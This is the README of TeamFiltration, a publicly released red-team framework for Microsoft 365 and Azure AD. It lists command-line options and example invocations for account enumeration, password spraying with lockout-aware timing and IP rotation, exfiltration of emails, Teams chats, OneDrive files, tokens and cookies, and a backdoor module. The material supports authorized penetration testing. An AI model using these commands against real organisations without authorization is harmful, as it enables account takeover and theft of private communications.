<p align="center"> <img src="TFLogo.png" width="500px" alt="TeamFiltration" /> </p>TeamFiltration
TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts. See the TeamFiltration wiki page for an introduction into how TeamFiltration works and the Quick Start Guide for how to get up and running!
This tool has been used internally while working at TrustedSec since January 2021 and was publicly released in my talk Taking a Dumb In The Cloud during DefCON30.
You can download the latest precompiled release for Linux, Windows and MacOS
The releases are precompiled into a single application-dependent binary. The size go up, but you do not need NET or any other dependencies to run them.
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[❤] TeamFiltration V3.5.4 PUBLIC, created by @Flangvik at @KovertNO, @TrustedSec
[+] Args parsed
--outpath Output path to store database and exfiltrated information (Needed for all modules)
--config Local path to your TeamFiltration.json configuration file, if not provided will load from the current path
--exfil Load the exfiltration module
--username Override to target a given username that does not exist in the database
--password Override to target a given password that does not exist in the database
--tokens Override to target a (file with newline seperated JWT tokens|single JWT| , seperated JWT tokens) and perfom exfiltration
--cookie-dump Override to target a given account using it's refresh-cookie-collection
--all Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)
--aad Exfiltrate information from Graph API (domain users and groups)
--teams Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)
--teams-db Exfiltrate cookies and authentication tokens from an exfiltrated Teams database
--onedrive Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the users entire OneDrive directory)
--owa Exfiltrate information from the Outlook REST API (The last 2k emails, both sent and received)
--owa-limit Set the max amount of emails to exfiltrate, default is 2k.
--jwt-tokens Dump all gathered JSON formated JTW-tokens for SSO resources (MsGraph,AdGraph, Outlook, SharePoint, OneDrive, Teams)
--spray Load the spraying module
--aad-sso Use SecureWorks's Azure Active Directory password brute-forcing technique when spraying
--us-cloud When spraying companies attached to US Tenants (
--passwords Path to a list of passwords, common weak-passwords will be generated if not supplied
--exclude Path to a list of emails to exclude from spraying
--seasons-only Password genersated for spraying will only be based on seasons
--months-only Password generated for spraying will only be based on months
--common-only Spray with the top 20 most common passwords
--shuffle-passwords Shuffle the passwordlist before spraying
--shuffle-users Shuffle the target userlist before spraying
--shuffle-regions Shuffle FireProx regions when spraying
--auto-exfil If valid login is found, auto start the exfil module
--sleep-min Minimum minutes to sleep between each full rotation of spraying default=60
--sleep-max Maximum minutes to sleep between each full rotation of spraying default=100
--jitter Seconds between each individual authentication attempt. default=0
--time-window Defines a time windows where spraying should accour, in the military time format <12:00-19:00>
--push Get Pushover notifications when valid credentials are found (requires pushover keys in config)
--push-locked Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config)
--force Force the spraying to proceed even if there is less the <sleep> time since the last attempt
--enum Load the enumeration module
--domain Domain to perfom enumeration against, names pulled from statistically-likely-usernames if not provided with --usernames
--usernames Path to a list of usernames to enumerate (emails)
--dehashed Use the dehashed submodule in order to enumerate emails from a basedomain
--validate-msol Validate that the given o365 accounts exists using the public GetCredentialType method (Very RateLimited - Slow 20 e/s)
--validate-teams Validate that the given o365 accounts exists using the Teams API method (Recommended - Super Fast 300 e/s)
--validate-login Validate that the given o365 accounts by attemping to login (Noisy - triggers logins - Fast 100 e/s)
--backdoor Loads the interactive backdoor module
--database Loads the interactive database browser module
--debug Proxy all outgoing HTTP requests through the proxy specified in the config
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --backdoor
--outpath C:\Clients\2024\FooBar\TFOutput --config myCustomConfig.json --database
- GitHub - KoenZomers/OneDriveAPI: API in .NET to communicate with OneDrive Personal and OneDrive for Business
- Research into Undocumented Behavior of Azure AD Refresh Tokens
- WS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation
- Credits to Ryan for validating and discussing my observations / questions!
- The entire TrustedSec team for helping me polish this tool!